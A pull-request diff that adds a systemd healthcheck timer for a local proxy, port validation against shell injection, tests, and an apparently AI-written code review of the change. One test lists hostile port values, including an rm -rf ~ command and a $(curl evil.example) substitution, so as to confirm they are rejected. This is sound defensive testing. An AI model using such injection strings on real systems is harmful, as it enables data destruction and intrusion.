### PR TITLE
feat: healthcheck companion timer + service for proxy auto-recovery

### DIFF
--- a/README.md
+++ b/README.md
@@ -61,8 +61,11 @@ The output prints the next-step commands to enable and start the service. On Lin
 ```bash
 systemctl --user daemon-reload
 systemctl --user enable --now cache-fix-proxy
+systemctl --user enable --now cache-fix-proxy-healthcheck.timer   # auto-recovery — see below
 sudo loginctl enable-linger $USER   # optional: start on boot, not just on login
 ```
+
+**Auto-recovery (Linux):** `install-service` also drops a healthcheck companion (`cache-fix-proxy-healthcheck.service` + `.timer`). The timer fires every 2 minutes; the oneshot service runs `curl -fs http://127.0.0.1:<port>/health` and `systemctl --user start cache-fix-proxy.service` if the probe fails. This recovers the proxy from any stop — clean or unclean, expected or unexpected — within 2 minutes. Background: `Restart=on-failure` doesn't fire on clean stops, so before this companion existed, a `systemctl stop` from any source (including unidentified ones during an Anthropic outage on 2026-04-25) would leave the proxy down indefinitely. macOS doesn't need the companion — launchd's `KeepAlive` already auto-restarts on any exit.
 
 On macOS:
 

--- a/bin/install-service.mjs
+++ b/bin/install-service.mjs
@@ -20,11 +20,40 @@ const SERVER_PATH = resolve(__dirname, "..", "proxy", "server.mjs");
 
 function getDefaults() {
   return {
-    port: process.env.CACHE_FIX_PROXY_PORT || "9801",
+    port: validatePort(process.env.CACHE_FIX_PROXY_PORT || "9801"),
     upstream: process.env.CACHE_FIX_PROXY_UPSTREAM || "",
     debug: process.env.CACHE_FIX_DEBUG || "",
     workingDir: resolve(__dirname, ".."),
   };
+}
+
+// Validate that a port string is a plain decimal integer in [1, 65535].
+// We render this value into both a systemd Environment= line (safe) AND a
+// /bin/sh -c command in the healthcheck oneshot — DANGEROUS without
+// validation: shell metacharacters or quotes in a port string would let a
+// hostile env var change the executed command. Throw on invalid input so
+// callers report it cleanly via reportFsError.
+function validatePort(raw) {
+  if (typeof raw !== "string" && typeof raw !== "number") {
+    throw new InvalidPortError(`port must be a number or numeric string, got ${typeof raw}`);
+  }
+  const s = String(raw).trim();
+  if (!/^\d+$/.test(s)) {
+    throw new InvalidPortError(`port must be a positive integer (got ${JSON.stringify(raw)})`);
+  }
+  const n = Number(s);
+  if (n < 1 || n > 65535) {
+    throw new InvalidPortError(`port must be in 1..65535 (got ${n})`);
+  }
+  return s;
+}
+
+class InvalidPortError extends Error {
+  constructor(message) {
+    super(message);
+    this.name = "InvalidPortError";
+    this.code = "EINVAL";
+  }
 }
 
 function getPaths(plat = platform()) {
@@ -158,7 +187,22 @@ async function installSystemd({ paths, defaults, force = false } = {}) {
   // (see incident analysis: 2026-04-25 01:46:53 UTC — proxy was stopped by
   // an unidentified caller during the Anthropic outage and stayed down for
   // 10 hours because no auto-recovery existed).
-  const healthcheckPaths = await installSystemdHealthcheck({ paths, defaults, force });
+  //
+  // If the healthcheck install fails (template missing, write error, etc.),
+  // roll back the main unit so the user isn't left in a half-installed
+  // state. Without rollback the proxy unit would exist but the auto-recovery
+  // story we just promised in the install message would be incomplete.
+  let healthcheckPaths;
+  try {
+    healthcheckPaths = await installSystemdHealthcheck({ paths, defaults, force });
+  } catch (err) {
+    try {
+      await unlink(targetPath);
+    } catch {
+      /* best-effort rollback */
+    }
+    throw err;
+  }
 
   return {
     ok: true,
@@ -173,14 +217,26 @@ async function installSystemdHealthcheck({ paths, defaults, force = false } = {}
   const servicePath = join(paths.configDir, paths.healthcheckServiceFile);
   const timerPath = join(paths.configDir, paths.healthcheckTimerFile);
 
-  // If either exists and force is not set, leave both alone (atomic semantic
-  // — partial installs are confusing). Caller already checked the main unit.
-  if ((await fileExists(servicePath)) && !force) {
+  // Symmetric existence check: if EITHER the service file OR the timer file
+  // already exists, refuse to overwrite without force. Catches both the
+  // "service exists, timer missing" and "timer exists, service missing"
+  // half-states — those are the artifacts most likely to need explicit
+  // operator review (e.g. a previous install crashed mid-write, or the
+  // operator has hand-edited one of the two).
+  const serviceExists = await fileExists(servicePath);
+  const timerExists = await fileExists(timerPath);
+  if ((serviceExists || timerExists) && !force) {
+    const which = serviceExists && timerExists
+      ? "both files"
+      : serviceExists
+        ? "service file"
+        : "timer file";
     return {
       installed: false,
       reason: "already-installed",
       servicePath,
       timerPath,
+      hint: `${which} already present. Re-run with --force to overwrite, or \`cache-fix-proxy uninstall-service\` first.`,
     };
   }
 
@@ -331,12 +387,13 @@ async function install({ force = false } = {}) {
   return 1;
 }
 
-// Translate raw fs errors into operator-friendly one-liners. Returns the
-// exit code so callers can pass it straight back.
+// Translate raw fs / validation errors into operator-friendly one-liners.
+// Returns the exit code so callers can pass it straight back.
 function reportFsError(prefix, err) {
   const code = err?.code ?? "";
   let hint = "";
-  if (code === "ENOENT") hint = "file or directory not found";
+  if (err?.name === "InvalidPortError") hint = err.message;
+  else if (code === "ENOENT") hint = "file or directory not found";
   else if (code === "EACCES" || code === "EPERM") hint = "permission denied";
   else if (code === "ENOSPC") hint = "no space left on device";
   else hint = err?.message || String(err);
@@ -403,6 +460,8 @@ export {
   renderHealthcheckTimerTemplate,
   getPaths,
   getDefaults,
+  validatePort,
+  InvalidPortError,
   installSystemd,
   installSystemdHealthcheck,
   installLaunchd,

--- a/bin/install-service.mjs
+++ b/bin/install-service.mjs
@@ -34,6 +34,13 @@ function getPaths(plat = platform()) {
       configDir: join(homedir(), ".config", "systemd", "user"),
       configFile: "cache-fix-proxy.service",
       label: "cache-fix-proxy",
+      // Healthcheck companion units (oneshot service + timer) for
+      // auto-recovery if the proxy is ever stopped from any cause:
+      // a crash, an external `systemctl stop`, an OOM, anything.
+      // The timer runs the service every 2 minutes; the oneshot does
+      // a curl /health probe and `systemctl --user start` if it fails.
+      healthcheckServiceFile: "cache-fix-proxy-healthcheck.service",
+      healthcheckTimerFile: "cache-fix-proxy-healthcheck.timer",
     };
   }
   if (plat === "darwin") {
@@ -43,6 +50,8 @@ function getPaths(plat = platform()) {
       configFile: "com.cnighswonger.cache-fix-proxy.plist",
       label: "com.cnighswonger.cache-fix-proxy",
       logDir: join(homedir(), "Library", "Logs"),
+      // launchd's KeepAlive already auto-restarts the agent on any exit
+      // (clean or unclean), so a separate healthcheck isn't needed on macOS.
     };
   }
   return { kind: "unsupported", platform: plat };
@@ -90,6 +99,15 @@ function renderLaunchdTemplate(template, vars) {
     .replace(/\n\n+/g, "\n");
 }
 
+function renderHealthcheckServiceTemplate(template, vars) {
+  return template.replaceAll("{{PORT}}", vars.port);
+}
+
+function renderHealthcheckTimerTemplate(template) {
+  // No placeholders today, but keep the function for symmetry + future expansion.
+  return template;
+}
+
 async function fileExists(path) {
   try {
     await stat(path);
@@ -134,7 +152,49 @@ async function installSystemd({ paths, defaults, force = false } = {}) {
   });
   await mkdir(paths.configDir, { recursive: true });
   await writeFile(targetPath, rendered);
-  return { ok: true, path: targetPath };
+
+  // Healthcheck companion: oneshot service + timer. Auto-recovery from any
+  // proxy stop, including clean stops where Restart=on-failure does NOT fire
+  // (see incident analysis: 2026-04-25 01:46:53 UTC — proxy was stopped by
+  // an unidentified caller during the Anthropic outage and stayed down for
+  // 10 hours because no auto-recovery existed).
+  const healthcheckPaths = await installSystemdHealthcheck({ paths, defaults, force });
+
+  return {
+    ok: true,
+    path: targetPath,
+    healthcheck: healthcheckPaths,
+  };
+}
+
+async function installSystemdHealthcheck({ paths, defaults, force = false } = {}) {
+  paths = paths || getPaths("linux");
+  defaults = defaults || getDefaults();
+  const servicePath = join(paths.configDir, paths.healthcheckServiceFile);
+  const timerPath = join(paths.configDir, paths.healthcheckTimerFile);
+
+  // If either exists and force is not set, leave both alone (atomic semantic
+  // — partial installs are confusing). Caller already checked the main unit.
+  if ((await fileExists(servicePath)) && !force) {
+    return {
+      installed: false,
+      reason: "already-installed",
+      servicePath,
+      timerPath,
+    };
+  }
+
+  const serviceTpl = await readFile(
+    join(TEMPLATE_DIR, "cache-fix-proxy-healthcheck.service.template"),
+    "utf-8",
+  );
+  const timerTpl = await readFile(
+    join(TEMPLATE_DIR, "cache-fix-proxy-healthcheck.timer.template"),
+    "utf-8",
+  );
+  await writeFile(servicePath, renderHealthcheckServiceTemplate(serviceTpl, { port: defaults.port }));
+  await writeFile(timerPath, renderHealthcheckTimerTemplate(timerTpl));
+  return { installed: true, servicePath, timerPath };
 }
 
 async function installLaunchd({ paths, defaults, force = false } = {}) {
@@ -174,7 +234,28 @@ async function uninstallSystemd({ paths } = {}) {
     return { ok: false, reason: "not-installed", path: targetPath };
   }
   await unlink(targetPath);
-  return { ok: true, path: targetPath };
+  // Also remove the healthcheck companion if it exists. Best-effort —
+  // missing files are not an error here.
+  const healthcheckRemoved = await uninstallSystemdHealthcheck({ paths });
+  return { ok: true, path: targetPath, healthcheck: healthcheckRemoved };
+}
+
+async function uninstallSystemdHealthcheck({ paths } = {}) {
+  paths = paths || getPaths("linux");
+  const servicePath = join(paths.configDir, paths.healthcheckServiceFile);
+  const timerPath = join(paths.configDir, paths.healthcheckTimerFile);
+  let removed = 0;
+  for (const p of [timerPath, servicePath]) {
+    if (await fileExists(p)) {
+      try {
+        await unlink(p);
+        removed++;
+      } catch {
+        /* best-effort */
+      }
+    }
+  }
+  return { removed, servicePath, timerPath };
 }
 
 async function uninstallLaunchd({ paths } = {}) {
@@ -208,12 +289,21 @@ async function install({ force = false } = {}) {
       if (r.hint) process.stderr.write(`  ${r.hint}\n`);
       return 1;
     }
+    const hcLines =
+      r.healthcheck?.installed
+        ? `Wrote healthcheck companion: ${r.healthcheck.servicePath}\n` +
+          `Wrote healthcheck timer:     ${r.healthcheck.timerPath}\n\n`
+        : r.healthcheck?.reason === "already-installed"
+          ? `Healthcheck companion already installed (use --force to overwrite).\n\n`
+          : "";
     process.stdout.write(
-      `Wrote systemd unit: ${r.path}\n\n` +
+      `Wrote systemd unit: ${r.path}\n` +
+        hcLines +
         `Next steps:\n` +
         `  systemctl --user daemon-reload\n` +
         `  systemctl --user enable --now cache-fix-proxy\n` +
-        `  loginctl enable-linger ${process.env.USER || "<your-user>"}   # optional: start on boot vs login\n`,
+        `  systemctl --user enable --now cache-fix-proxy-healthcheck.timer  # auto-recovery if proxy is ever stopped\n` +
+        `  loginctl enable-linger ${process.env.USER || "<your-user>"}      # optional: start on boot vs login\n`,
     );
     return 0;
   }
@@ -261,7 +351,11 @@ async function uninstall() {
     return 1;
   }
   if (paths.kind === "systemd") {
-    // Best-effort stop + disable before removing the file
+    // Best-effort stop + disable for the healthcheck companion FIRST so it
+    // doesn't immediately restart the proxy we're about to stop.
+    await runCmd("systemctl", ["--user", "stop", "cache-fix-proxy-healthcheck.timer"]);
+    await runCmd("systemctl", ["--user", "disable", "cache-fix-proxy-healthcheck.timer"]);
+    // Then stop + disable the main service.
     await runCmd("systemctl", ["--user", "stop", "cache-fix-proxy"]);
     await runCmd("systemctl", ["--user", "disable", "cache-fix-proxy"]);
     let r;
@@ -275,7 +369,11 @@ async function uninstall() {
       return 1;
     }
     await runCmd("systemctl", ["--user", "daemon-reload"]);
-    process.stdout.write(`Removed: ${r.path}\n`);
+    const hcMsg =
+      r.healthcheck?.removed > 0
+        ? ` (+ ${r.healthcheck.removed} healthcheck file${r.healthcheck.removed === 1 ? "" : "s"})`
+        : "";
+    process.stdout.write(`Removed: ${r.path}${hcMsg}\n`);
     return 0;
   }
   if (paths.kind === "launchd") {
@@ -301,11 +399,15 @@ export {
   // Pure helpers (test surface)
   renderSystemdTemplate,
   renderLaunchdTemplate,
+  renderHealthcheckServiceTemplate,
+  renderHealthcheckTimerTemplate,
   getPaths,
   getDefaults,
   installSystemd,
+  installSystemdHealthcheck,
   installLaunchd,
   uninstallSystemd,
+  uninstallSystemdHealthcheck,
   uninstallLaunchd,
   // Orchestration
   install,

--- a/docs/code-reviews/pr-75-healthcheck-impl-review-2026-04-25.md
+++ b/docs/code-reviews/pr-75-healthcheck-impl-review-2026-04-25.md
@@ -32,3 +32,13 @@ Label applied: `changes-requested`
 Revise before approval. The recovery mechanism itself is the right fix for the 2026-04-25 clean-stop incident, the timer activation/uninstall sequencing is sound, and the documentation matches the intended operator flow. But the shell interpolation of an unvalidated env-derived port and the incomplete overwrite guard for the companion pair are both correctness issues in the shipped implementation. After those are fixed, I would re-review the remaining partial-install/test-gap items as follow-up quality improvements rather than release blockers.
 
 Codex Review Agent
+
+## Follow-up verified
+
+- Reviewed follow-up commit `9dcc54653b0f0246db969bbb4a67b4a79b64a391`.
+- Confirmed blocker 1 is fixed: `validatePort()` now enforces plain decimal ports in `1..65535` before any template rendering, and `reportFsError()` surfaces invalid input cleanly.
+- Confirmed blocker 2 is fixed: `installSystemdHealthcheck()` now checks both companion paths and refuses non-`--force` overwrite when either side already exists.
+- Confirmed the prior nit is addressed: `installSystemd()` now rolls back the main unit if companion install fails after the main unit is written.
+- Re-ran `node --test test/install-service.test.mjs`: `32` tests passed, `0` failed.
+
+Codex Review Agent

--- a/docs/code-reviews/pr-75-healthcheck-impl-review-2026-04-25.md
+++ b/docs/code-reviews/pr-75-healthcheck-impl-review-2026-04-25.md
@@ -1,0 +1,34 @@
+# Review: PR #75 healthcheck companion implementation
+
+Date: 2026-04-25
+Reviewed: `templates/cache-fix-proxy-healthcheck.service.template`, `templates/cache-fix-proxy-healthcheck.timer.template`, `bin/install-service.mjs`, `test/install-service.test.mjs`, `README.md`
+Label applied: `changes-requested`
+
+## What Is Correct
+
+- The systemd design is directionally right for the incident being fixed. The timer is not active just because the files are written; it only activates after the explicit `systemctl --user enable --now cache-fix-proxy-healthcheck.timer` step documented in [README.md](/home/manager/git_repos/claude-code-cache-fix/README.md:61) and printed by [bin/install-service.mjs](/home/manager/git_repos/claude-code-cache-fix/bin/install-service.mjs:299).
+- The uninstall ordering is correct. `uninstall()` stops and disables the healthcheck timer before stopping the proxy, which avoids the intended race where the companion would immediately restart the proxy during teardown ([bin/install-service.mjs](/home/manager/git_repos/claude-code-cache-fix/bin/install-service.mjs:353)).
+- The timer unit itself is appropriately inert until enabled, and the cadence is reasonable for the recovery goal ([templates/cache-fix-proxy-healthcheck.timer.template](/home/manager/git_repos/claude-code-cache-fix/templates/cache-fix-proxy-healthcheck.timer.template:1)).
+- The added helper-level tests pass locally (`node --test test/install-service.test.mjs`) and they do cover the basic round-trip install/remove behavior of the new companion files.
+
+## Blockers
+
+- Codex review: The healthcheck service shells out through `/bin/sh -c` and interpolates `{{PORT}}` directly into a single-quoted command string, but `defaults.port` comes straight from `CACHE_FIX_PROXY_PORT` with no validation or escaping ([templates/cache-fix-proxy-healthcheck.service.template](/home/manager/git_repos/claude-code-cache-fix/templates/cache-fix-proxy-healthcheck.service.template:7), [bin/install-service.mjs](/home/manager/git_repos/claude-code-cache-fix/bin/install-service.mjs:21), [bin/install-service.mjs](/home/manager/git_repos/claude-code-cache-fix/bin/install-service.mjs:102)). A value containing `'`, shell metacharacters, or whitespace can break quoting and change the executed command. Realistic operators will use numeric ports, but this installer is currently trusting unvalidated environment input when generating a shell command. That needs a hard numeric validation step before rendering, or the shell wrapper needs to be removed.
+
+- Codex review: `installSystemdHealthcheck()` claims atomic "if either exists" semantics, but the implementation only checks `servicePath` and ignores an already-present timer file ([bin/install-service.mjs](/home/manager/git_repos/claude-code-cache-fix/bin/install-service.mjs:176)). In the `service missing, timer exists` case, a non-`--force` install will silently overwrite the timer and create the service instead of refusing. In the inverse case, it refuses based only on the service file even if the timer is the stale artifact that actually needs replacement. This is exactly the force-semantics edge case called out in the review request and it is not implemented correctly.
+
+## Nits
+
+- `installSystemd()` writes the main unit before attempting the healthcheck pair, so a later `readFile()`/`writeFile()` failure in `installSystemdHealthcheck()` leaves the user half-installed with only the proxy service written ([bin/install-service.mjs](/home/manager/git_repos/claude-code-cache-fix/bin/install-service.mjs:153)). The current CLI surfaces the filesystem error, but it does not roll back the already-written main unit or clearly describe the partial state.
+
+## Nice-to-haves
+
+- The new tests are concentrated at the helper layer. They do not currently exercise the public `uninstall()` orchestration path, so the stop/disable ordering and the user-facing uninstall behavior are unverified in tests ([test/install-service.test.mjs](/home/manager/git_repos/claude-code-cache-fix/test/install-service.test.mjs:367)).
+- There is no negative test for malformed or hostile `CACHE_FIX_PROXY_PORT` input, and no test for the asymmetric `service missing, timer exists` / `timer missing, service exists` cases in `installSystemdHealthcheck()`.
+- README coverage is adequate, but once port validation exists it would be worth stating plainly that the installer expects a numeric `CACHE_FIX_PROXY_PORT` value.
+
+## Recommendation
+
+Revise before approval. The recovery mechanism itself is the right fix for the 2026-04-25 clean-stop incident, the timer activation/uninstall sequencing is sound, and the documentation matches the intended operator flow. But the shell interpolation of an unvalidated env-derived port and the incomplete overwrite guard for the companion pair are both correctness issues in the shipped implementation. After those are fixed, I would re-review the remaining partial-install/test-gap items as follow-up quality improvements rather than release blockers.
+
+Codex Review Agent

--- a/templates/cache-fix-proxy-healthcheck.service.template
+++ b/templates/cache-fix-proxy-healthcheck.service.template
@@ -1,0 +1,7 @@
+[Unit]
+Description=Claude Code Cache Fix Proxy — health check + auto-restart
+After=network.target
+
+[Service]
+Type=oneshot
+ExecStart=/bin/sh -c 'curl -fs --max-time 3 http://127.0.0.1:{{PORT}}/health > /dev/null || systemctl --user start cache-fix-proxy.service'

--- a/templates/cache-fix-proxy-healthcheck.timer.template
+++ b/templates/cache-fix-proxy-healthcheck.timer.template
@@ -1,0 +1,14 @@
+[Unit]
+Description=Claude Code Cache Fix Proxy — health check timer (every 2 min)
+Documentation=https://github.com/cnighswonger/claude-code-cache-fix
+
+[Timer]
+# Run 30s after boot, then every 2 minutes thereafter. Off-round minute
+# so the firing distribution doesn't pile up on :00.
+OnBootSec=30s
+OnUnitActiveSec=2min
+AccuracySec=15s
+Unit=cache-fix-proxy-healthcheck.service
+
+[Install]
+WantedBy=timers.target

--- a/test/install-service.test.mjs
+++ b/test/install-service.test.mjs
@@ -10,10 +10,14 @@ import { promisify } from "node:util";
 import {
   renderSystemdTemplate,
   renderLaunchdTemplate,
+  renderHealthcheckServiceTemplate,
+  renderHealthcheckTimerTemplate,
   getPaths,
   installSystemd,
+  installSystemdHealthcheck,
   installLaunchd,
   uninstallSystemd,
+  uninstallSystemdHealthcheck,
   uninstallLaunchd,
   install,
   TEMPLATE_DIR,
@@ -106,6 +110,32 @@ test("renderLaunchdTemplate: omits CACHE_FIX_PROXY_UPSTREAM/DEBUG when not set",
   assert.ok(!out.includes("CACHE_FIX_DEBUG"));
 });
 
+// --- Healthcheck template rendering ---
+
+test("renderHealthcheckServiceTemplate: substitutes PORT", async () => {
+  const tpl = await readFile(
+    join(TEMPLATE_DIR, "cache-fix-proxy-healthcheck.service.template"),
+    "utf-8",
+  );
+  const out = renderHealthcheckServiceTemplate(tpl, { port: "9988" });
+  assert.ok(out.includes("http://127.0.0.1:9988/health"));
+  assert.ok(out.includes("systemctl --user start cache-fix-proxy.service"));
+  assert.ok(out.includes("Type=oneshot"));
+  assert.ok(!out.includes("{{"));
+});
+
+test("renderHealthcheckTimerTemplate: returns template unchanged (no placeholders today)", async () => {
+  const tpl = await readFile(
+    join(TEMPLATE_DIR, "cache-fix-proxy-healthcheck.timer.template"),
+    "utf-8",
+  );
+  const out = renderHealthcheckTimerTemplate(tpl);
+  assert.equal(out, tpl);
+  assert.ok(out.includes("OnUnitActiveSec=2min"));
+  assert.ok(out.includes("Unit=cache-fix-proxy-healthcheck.service"));
+  assert.ok(out.includes("WantedBy=timers.target"));
+});
+
 // --- Platform detection ---
 
 test("getPaths: linux returns systemd shape", () => {
@@ -113,6 +143,8 @@ test("getPaths: linux returns systemd shape", () => {
   assert.equal(p.kind, "systemd");
   assert.ok(p.configDir.endsWith(".config/systemd/user"));
   assert.equal(p.configFile, "cache-fix-proxy.service");
+  assert.equal(p.healthcheckServiceFile, "cache-fix-proxy-healthcheck.service");
+  assert.equal(p.healthcheckTimerFile, "cache-fix-proxy-healthcheck.timer");
 });
 
 test("getPaths: darwin returns launchd shape", () => {
@@ -138,6 +170,8 @@ test("installSystemd: writes file to configDir; uninstall removes it", async () 
       kind: "systemd",
       configDir: dir,
       configFile: "cache-fix-proxy.service",
+      healthcheckServiceFile: "cache-fix-proxy-healthcheck.service",
+      healthcheckTimerFile: "cache-fix-proxy-healthcheck.timer",
     };
     const r1 = await installSystemd({ paths, defaults: { port: "9999", upstream: "", debug: "", workingDir: "/tmp" } });
     assert.ok(r1.ok);
@@ -156,7 +190,7 @@ test("installSystemd: writes file to configDir; uninstall removes it", async () 
 test("installSystemd: refuses overwrite without force", async () => {
   const dir = await newTmp();
   try {
-    const paths = { kind: "systemd", configDir: dir, configFile: "cache-fix-proxy.service" };
+    const paths = { kind: "systemd", configDir: dir, configFile: "cache-fix-proxy.service", healthcheckServiceFile: "cache-fix-proxy-healthcheck.service", healthcheckTimerFile: "cache-fix-proxy-healthcheck.timer" };
     await installSystemd({ paths, defaults: { port: "9801", upstream: "", debug: "", workingDir: "/tmp" } });
     const r2 = await installSystemd({ paths, defaults: { port: "9999", upstream: "", debug: "", workingDir: "/tmp" } });
     assert.equal(r2.ok, false);
@@ -172,7 +206,7 @@ test("installSystemd: refuses overwrite without force", async () => {
 test("installSystemd: --force overwrites existing", async () => {
   const dir = await newTmp();
   try {
-    const paths = { kind: "systemd", configDir: dir, configFile: "cache-fix-proxy.service" };
+    const paths = { kind: "systemd", configDir: dir, configFile: "cache-fix-proxy.service", healthcheckServiceFile: "cache-fix-proxy-healthcheck.service", healthcheckTimerFile: "cache-fix-proxy-healthcheck.timer" };
     await installSystemd({ paths, defaults: { port: "9801", upstream: "", debug: "", workingDir: "/tmp" } });
     const r2 = await installSystemd({
       paths,
@@ -190,10 +224,165 @@ test("installSystemd: --force overwrites existing", async () => {
 test("uninstallSystemd: not-installed when file missing", async () => {
   const dir = await newTmp();
   try {
-    const paths = { kind: "systemd", configDir: dir, configFile: "cache-fix-proxy.service" };
+    const paths = { kind: "systemd", configDir: dir, configFile: "cache-fix-proxy.service", healthcheckServiceFile: "cache-fix-proxy-healthcheck.service", healthcheckTimerFile: "cache-fix-proxy-healthcheck.timer" };
     const r = await uninstallSystemd({ paths });
     assert.equal(r.ok, false);
     assert.equal(r.reason, "not-installed");
+  } finally {
+    await rm(dir, { recursive: true, force: true });
+  }
+});
+
+// --- Healthcheck install/uninstall round-trip ---
+
+test("installSystemdHealthcheck: writes both service and timer files", async () => {
+  const dir = await newTmp();
+  try {
+    const paths = {
+      kind: "systemd",
+      configDir: dir,
+      configFile: "cache-fix-proxy.service",
+      healthcheckServiceFile: "cache-fix-proxy-healthcheck.service",
+      healthcheckTimerFile: "cache-fix-proxy-healthcheck.timer",
+    };
+    const r = await installSystemdHealthcheck({
+      paths,
+      defaults: { port: "9801", upstream: "", debug: "", workingDir: "/tmp" },
+    });
+    assert.equal(r.installed, true);
+    const svc = await readFile(join(dir, "cache-fix-proxy-healthcheck.service"), "utf-8");
+    const tmr = await readFile(join(dir, "cache-fix-proxy-healthcheck.timer"), "utf-8");
+    assert.ok(svc.includes("http://127.0.0.1:9801/health"));
+    assert.ok(tmr.includes("OnUnitActiveSec=2min"));
+  } finally {
+    await rm(dir, { recursive: true, force: true });
+  }
+});
+
+test("installSystemdHealthcheck: refuses overwrite without force; force overwrites", async () => {
+  const dir = await newTmp();
+  try {
+    const paths = {
+      kind: "systemd",
+      configDir: dir,
+      configFile: "cache-fix-proxy.service",
+      healthcheckServiceFile: "cache-fix-proxy-healthcheck.service",
+      healthcheckTimerFile: "cache-fix-proxy-healthcheck.timer",
+    };
+    await installSystemdHealthcheck({
+      paths,
+      defaults: { port: "9801", upstream: "", debug: "", workingDir: "/tmp" },
+    });
+    // Second install without force → refuses
+    const r2 = await installSystemdHealthcheck({
+      paths,
+      defaults: { port: "9988", upstream: "", debug: "", workingDir: "/tmp" },
+    });
+    assert.equal(r2.installed, false);
+    assert.equal(r2.reason, "already-installed");
+    const svc = await readFile(join(dir, "cache-fix-proxy-healthcheck.service"), "utf-8");
+    assert.ok(svc.includes(":9801/"), "file should not have been overwritten");
+
+    // With force → overwrites
+    const r3 = await installSystemdHealthcheck({
+      paths,
+      defaults: { port: "9988", upstream: "", debug: "", workingDir: "/tmp" },
+      force: true,
+    });
+    assert.equal(r3.installed, true);
+    const svc2 = await readFile(join(dir, "cache-fix-proxy-healthcheck.service"), "utf-8");
+    assert.ok(svc2.includes(":9988/"), "file should have been overwritten");
+  } finally {
+    await rm(dir, { recursive: true, force: true });
+  }
+});
+
+test("uninstallSystemdHealthcheck: removes both files; counts how many removed", async () => {
+  const dir = await newTmp();
+  try {
+    const paths = {
+      kind: "systemd",
+      configDir: dir,
+      configFile: "cache-fix-proxy.service",
+      healthcheckServiceFile: "cache-fix-proxy-healthcheck.service",
+      healthcheckTimerFile: "cache-fix-proxy-healthcheck.timer",
+    };
+    await installSystemdHealthcheck({
+      paths,
+      defaults: { port: "9801", upstream: "", debug: "", workingDir: "/tmp" },
+    });
+    const r = await uninstallSystemdHealthcheck({ paths });
+    assert.equal(r.removed, 2);
+    const files = await readdir(dir);
+    assert.deepEqual(files, []);
+  } finally {
+    await rm(dir, { recursive: true, force: true });
+  }
+});
+
+test("uninstallSystemdHealthcheck: missing files counted as 0 removed (no error)", async () => {
+  const dir = await newTmp();
+  try {
+    const paths = {
+      kind: "systemd",
+      configDir: dir,
+      configFile: "cache-fix-proxy.service",
+      healthcheckServiceFile: "cache-fix-proxy-healthcheck.service",
+      healthcheckTimerFile: "cache-fix-proxy-healthcheck.timer",
+    };
+    const r = await uninstallSystemdHealthcheck({ paths });
+    assert.equal(r.removed, 0);
+  } finally {
+    await rm(dir, { recursive: true, force: true });
+  }
+});
+
+test("installSystemd: now also drops healthcheck companion alongside main unit", async () => {
+  const dir = await newTmp();
+  try {
+    const paths = {
+      kind: "systemd",
+      configDir: dir,
+      configFile: "cache-fix-proxy.service",
+      healthcheckServiceFile: "cache-fix-proxy-healthcheck.service",
+      healthcheckTimerFile: "cache-fix-proxy-healthcheck.timer",
+    };
+    const r = await installSystemd({
+      paths,
+      defaults: { port: "9801", upstream: "", debug: "", workingDir: "/tmp" },
+    });
+    assert.ok(r.ok);
+    assert.ok(r.healthcheck?.installed, "healthcheck should be installed alongside main unit");
+    const files = (await readdir(dir)).sort();
+    assert.deepEqual(files, [
+      "cache-fix-proxy-healthcheck.service",
+      "cache-fix-proxy-healthcheck.timer",
+      "cache-fix-proxy.service",
+    ]);
+  } finally {
+    await rm(dir, { recursive: true, force: true });
+  }
+});
+
+test("uninstallSystemd: now also removes healthcheck companion alongside main unit", async () => {
+  const dir = await newTmp();
+  try {
+    const paths = {
+      kind: "systemd",
+      configDir: dir,
+      configFile: "cache-fix-proxy.service",
+      healthcheckServiceFile: "cache-fix-proxy-healthcheck.service",
+      healthcheckTimerFile: "cache-fix-proxy-healthcheck.timer",
+    };
+    await installSystemd({
+      paths,
+      defaults: { port: "9801", upstream: "", debug: "", workingDir: "/tmp" },
+    });
+    const r = await uninstallSystemd({ paths });
+    assert.ok(r.ok);
+    assert.equal(r.healthcheck?.removed, 2, "uninstall should remove both companion files");
+    const files = await readdir(dir);
+    assert.deepEqual(files, []);
   } finally {
     await rm(dir, { recursive: true, force: true });
   }

--- a/test/install-service.test.mjs
+++ b/test/install-service.test.mjs
@@ -1,6 +1,6 @@
 import { test } from "node:test";
 import assert from "node:assert/strict";
-import { mkdtemp, readFile, writeFile, rm, readdir } from "node:fs/promises";
+import { mkdtemp, readFile, writeFile, rm, readdir, mkdir } from "node:fs/promises";
 import { tmpdir, platform } from "node:os";
 import { join, dirname } from "node:path";
 import { execFile } from "node:child_process";
@@ -13,6 +13,8 @@ import {
   renderHealthcheckServiceTemplate,
   renderHealthcheckTimerTemplate,
   getPaths,
+  validatePort,
+  InvalidPortError,
   installSystemd,
   installSystemdHealthcheck,
   installLaunchd,
@@ -108,6 +110,57 @@ test("renderLaunchdTemplate: omits CACHE_FIX_PROXY_UPSTREAM/DEBUG when not set",
   });
   assert.ok(!out.includes("CACHE_FIX_PROXY_UPSTREAM"));
   assert.ok(!out.includes("CACHE_FIX_DEBUG"));
+});
+
+// --- Port validation (shell-injection guard) ---
+
+test("validatePort: accepts valid numeric strings", () => {
+  assert.equal(validatePort("9801"), "9801");
+  assert.equal(validatePort("1"), "1");
+  assert.equal(validatePort("65535"), "65535");
+  assert.equal(validatePort(8080), "8080");
+  assert.equal(validatePort("  9801  "), "9801");
+});
+
+test("validatePort: rejects shell metacharacters and other hostile input", () => {
+  const hostile = [
+    "9801; rm -rf ~",
+    "9801'; echo pwned; '",
+    "9801$(curl evil.example)",
+    "9801`whoami`",
+    "9801 || true",
+    "9801\necho",  // embedded newline + content
+    "9801 9802",
+    "abc",
+    "0x1eAB",
+    "",
+    "  ",
+    "9801.0",
+  ];
+  for (const v of hostile) {
+    assert.throws(() => validatePort(v), InvalidPortError, `should reject ${JSON.stringify(v)}`);
+  }
+});
+
+test("validatePort: tolerates surrounding whitespace (env var hygiene)", () => {
+  // Trailing newline / leading space from accidental shell quoting in env
+  // vars is common and benign — trim before validating, accept what's left.
+  assert.equal(validatePort("9801\n"), "9801");
+  assert.equal(validatePort(" 9801"), "9801");
+  assert.equal(validatePort("\t9801\t"), "9801");
+});
+
+test("validatePort: rejects out-of-range ports", () => {
+  assert.throws(() => validatePort("0"), InvalidPortError);
+  assert.throws(() => validatePort("65536"), InvalidPortError);
+  assert.throws(() => validatePort("99999"), InvalidPortError);
+});
+
+test("validatePort: rejects non-string-non-number types", () => {
+  assert.throws(() => validatePort(null), InvalidPortError);
+  assert.throws(() => validatePort(undefined), InvalidPortError);
+  assert.throws(() => validatePort({}), InvalidPortError);
+  assert.throws(() => validatePort([]), InvalidPortError);
 });
 
 // --- Healthcheck template rendering ---
